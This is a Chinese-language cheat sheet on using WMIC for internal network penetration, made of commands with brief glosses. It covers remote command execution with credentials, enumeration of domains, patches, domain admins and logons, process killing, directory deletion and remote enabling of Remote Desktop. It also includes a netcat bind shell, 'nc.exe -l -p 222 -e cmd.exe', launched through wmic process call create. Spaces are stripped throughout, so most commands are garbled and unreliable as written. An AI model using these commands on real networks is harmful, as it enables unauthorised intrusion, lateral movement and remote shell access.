wmic在内网渗透中的应用

wmic/node:ip/user:ip(hostname,domain)\user/password[wmic命令]远程执行
wmic/node:ip/user:administrator/password:123455processlistbrief
-------------------------------------------------------------------------------------------------------------------------------------------------

wmicnicconfigwhereindex=1callenablestatic(“192.168.1.2″),(“255.255.255.0″)------配置ip,index=1为DeviceID或index

wmicnicconfigwhereindex=1callsetgateways(“192.168.1.1″),(1)------配置网关
--------------------------------------------------------------------------------------------------------------------------------------------------

wmiccomputersystemwhere“name=’abc’”callrename123------更改计算机名称

wmiccomputersystemwhere“caption=’%ComputerName%’”callrenamenewcomputername------更改计算机名称

wmiccomputersystemwhere“name=’google’”calljoindomainorworkgroup“”,”",”MyGroup”,1------更改工作组名称
--------------------------------------------------------------------------------------------------------------------------------------------------

wmicqfegetHotFixID,InstalledOn,Description-------获取补丁
--------------------------------------------------------------------------------------------------------------------------------------------------

wmicntdomain-------获取所有和本主机相关的域，可以看到域控制器的位置

--------------------------------------------------------------------------------------------------------------------------------------------------

wmicprocesswherename=”qq.exe”callterminate---------结束进程

wmicprocesswherename=”qq.exe”delete---------结束进程

wmicprocesswherepid=”123″delete---------结束对应PID进程

wmicprocesscallcreatec:\kav\2009.exe---------运行程序

wmicprocesscallcreate“C:\nc.exe-l-p222-ecmd.exe”--------运行参数
--------------------------------------------------------------------------------------------------------------------------------------------------

wmicCOMPUTERSYSTEM可以看是否为虚拟设备ManufacturerModel看这个

wmicDISKQUOTAgetQuotaVolume获取NTFS卷磁盘空间使用情况

wmicLOGICALDISKgetcaption,description,deviceid查看驱动盘的类型，这个比较全

wmicVOLUMEgetCaption,DriveLetter,FileSystem,name看驱动盘

wmicDISKDRIVEgetdeviceid,Caption,size,InterfaceType硬盘设备

wmi*ugetDescription,DeviceID,NameCPU

wmicNTEVENTWHERE“logfile=’Security’”查看windows目录

wmicFSDIRwhere&ldquo;drive=&rsquo;e:&rsquo;andpath=&rsquo;\\test\\&rsquo;andfilename<>&rsquo;abc&rsquo;&rdquo;calldelete删除e:\test目录下除目录abc的所有目录

wmicfsdir&ldquo;c:\\good&rdquo;calldelete删除c:\good文件夹

wmicfsdir&ldquo;c:\\good&rdquo;rename&ldquo;c:\abb&rdquo;重命名c:\good文件夹为abb
--------------------------------------------------------------------------------------------------------------------------------------------------

wmicLOGON可以查看什么类型的登录，什么时间登录的
--------------------------------------------------------------------------------------------------------------------------------------------------

wmicgroup在全局中查找

wmicgroupwhere&ldquo;name=&rsquo;domainadmins&rsquo;&rdquo;

wmicuseraccount在全局中查找

wmicuseraccountwhere&ldquo;name=&rsquo;administrator&rsquo;&rdquo;getCaption如果在域上，上面的命令都是在域中查询，很慢。

wmicUSERACCOUNTwhere&ldquo;name=&rsquo;%UserName%&rsquo;&rdquo;callrenamenewUserName更改账户名

wmic/node:%pcname%/USER:%pcaccount%PATHwin32_terminalservicesettingWHERE(__Class!=&rdquo;&quot;)CALLSetAllowTSConnections1远程打开计算机远程桌面
*
*